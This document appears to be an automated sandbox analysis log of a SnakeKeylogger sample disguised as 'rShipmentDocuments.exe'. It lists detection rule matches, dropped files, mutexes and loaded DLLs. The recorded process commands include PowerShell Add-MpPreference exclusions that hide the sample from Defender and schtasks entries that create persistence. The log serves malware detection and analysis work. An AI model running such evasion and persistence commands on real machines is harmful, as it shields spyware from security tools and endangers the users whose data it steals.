Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: rShipmentDocuments.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZOlmYtPdlO.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, B--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, B--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, B--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WHIuwreRDsPbwviSjC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WHIuwreRDsPbwviSjC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: _0020.SetAccessControl
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: _0020.AddAccessRule
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: _0020.SetAccessControl
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/15@3/4
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Mutant created: \Sessions\1\BaseNamedObjects\RDJCqbWVNpnzGVnTyiGSZiAgR
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File created: C:\Users\user\AppData\Local\Temp\tmp44A0.tmp
Source: rShipmentDocuments.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rShipmentDocuments.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: rShipmentDocuments.exe Virustotal: Detection: 37%
Source: rShipmentDocuments.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File read: C:\Users\user\Desktop\rShipmentDocuments.exe
Source: unknown Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: wldp.dll
